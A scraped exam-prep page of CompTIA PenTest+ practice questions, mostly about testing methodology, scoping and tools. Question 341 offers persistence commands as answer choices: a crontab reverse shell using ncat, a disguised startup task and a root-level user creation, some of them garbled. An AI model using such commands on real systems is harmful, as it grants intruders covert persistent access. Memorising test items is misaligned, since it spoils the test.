PT0-003 Exam Details

  • Exam Code
    :PT0-003
  • Exam Name
    :CompTIA PenTest+
  • Certification
    :CompTIA Certifications
  • Vendor
    :CompTIA
  • Total Questions
    :404 Q&As
  • Last Updated
    :Jun 01, 2026

CompTIA PT0-003 Online Questions & Answers

  • Question 341:

    A penetration tester was able to gain access successfully to a Windows workstation on a mobile client's laptop.

    Which of the following can be used to ensure the tester is able to maintain access to the system?

    A. schtasks /create /sc /ONSTART /tr C:\Temp\WindowsUpdate.exe
    B. wmic startup get caption,command
    C. crontab ; echo "@reboot sleep 200 && ncat vp 4242 /bin/bash") | crontab 2>/dev/null
    D. sudo useradd u 0 0 user

  • Question 342:

    A penetration tester enters an invalid user ID on the login page of a web application. The tester receives a message indicating the user is not found. Then, the tester tries a valid user ID but an incorrect password, but the web application indicates the password is invalid.

    Which of the following should the tester attempt next?

    A. Error log analysis
    B. DoS attack
    C. Enumeration
    D. Password dictionary attack

  • Question 343:

    A penetration tester is unable to identify the Wi-Fi SSID on a client's cell phone.

    Which of the following techniques would be most effective to troubleshoot this issue?

    A. Sidecar scanning
    B. Channel scanning
    C. Stealth scanning
    D. Static analysis scanning

  • Question 344:

    A tester who is performing a penetration test discovers an older firewall that is known to have serious vulnerabilities to remote attacks but is not part of the original list of IP addresses for the engagement.

    Which of the following is the BEST option for the tester to take?

    A. Segment the firewall from the cloud.
    B. Scan the firewall for vulnerabilities.
    C. Notify the client about the firewall.
    D. Apply patches to the firewall.

  • Question 345:

    Which of the following could be used to enhance the quality and reliability of a vulnerability scan report?

    A. Risk analysis
    B. Peer review
    C. Root cause analysis
    D. Client acceptance

  • Question 346:

    A penetration tester creates a list of target domains that require further enumeration. The tester writes the following script to perform vulnerability scanning across the domains:

    line 1: #!/usr/bin/bash

    line 2: DOMAINS_LIST = "/path/to/list.txt" line 3: while read -r i; do

    line 4: nikto -h $i -o scan-$i.txt & line 5: done The script does not work as intended.

    Which of the following should the tester do to fix the script?

    A. Change line 2 to {"domain1", "domain2", "domain3", }.
    B. Change line 3 to while true; read -r i; do.
    C. Change line 4 to nikto $i | tee scan-$i.txt.
    D. Change line 5 to done < "$DOMAINS_LIST".

  • Question 347:

    A penetration tester is configuring a vulnerability management solution to perform credentialed scans of an Active Directory server.

    Which of the following account types should the tester provide to the scanner?

    A. Read-only
    B. Domain administrator
    C. Local user
    D. Root

  • Question 348:

    Which of the following tools would be MOST useful in collecting vendor and other security-relevant information for IoT devices to support passive reconnaissance?

    A. Shodan
    B. Nmap
    C. WebScarab-NG
    D. Nessus

  • Question 349:

    A penetration tester needs to confirm the version number of a client's web application server.

    Which of the following techniques should the penetration tester use?

    A. SSL certificate inspection
    B. URL spidering
    C. Banner grabbing
    D. Directory brute forcing

  • Question 350:

    Which of the following compliance requirements would be BEST suited in an environment that processes credit card data?

    A. PCI DSS
    B. ISO 27001
    C. SOX
    D. GDPR

Tips on How to Prepare for the Exams

Nowadays, the certification exams become more and more important and required by more and more enterprises when applying for a job. But how to prepare for the exam effectively? How to prepare for the exam in a short time with less efforts? How to get a ideal result and how to find the most reliable resources? Here on Vcedump.com, you will find all the answers. Vcedump.com provide not only CompTIA exam questions, answers and explanations but also complete assistance on your exam preparation and certification application. If you are confused on your PT0-003 exam preparations and CompTIA certification application, do not hesitate to visit our Vcedump.com to find your solutions here.